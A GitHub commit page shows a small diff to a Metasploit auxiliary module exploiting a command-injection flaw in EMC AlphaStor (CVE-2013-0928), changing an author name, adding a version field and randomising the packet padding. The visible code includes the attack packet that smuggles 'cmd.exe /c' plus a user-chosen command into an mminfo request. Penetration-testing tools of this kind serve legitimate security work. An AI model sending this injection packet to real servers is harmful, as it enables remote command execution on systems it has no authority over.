Skip to content

Commit 4a479d1

Browse files
committed
Randomize padding on aux module, fix spacing on exploits
1 parent 7e2d474 commit 4a479d1

File tree

1 file changed

+4
-3
lines changed

1 file changed

+4
-3
lines changed

modules/auxiliary/server/emc_alphastor_75_cmd_injection.rb

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -15,11 +15,12 @@ def initialize(info = {})
1515
injection.
1616
},
1717
'Author' => [
18-
'Preston Thornburg', # [email protected]
18+
'Preston Thornburn', # [email protected]
1919
'Mohsan Farid', # [email protected]
2020
'Brent Morris' # [email protected]
2121
],
2222
'License' => MSF_LICENSE,
23+
'Version' => '$Revision: $',
2324
'References' =>
2425
[
2526
[ 'CVE', '2013-0928' ],
@@ -36,8 +37,8 @@ def initialize(info = {})
3637

3738
def run
3839
connect
39-
40-
padding = "\x41" * 512
40+
41+
padding = Rex::Text.rand_text_alpha_upper(512)
4142

4243
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
4344

0 commit comments

Comments
 (0)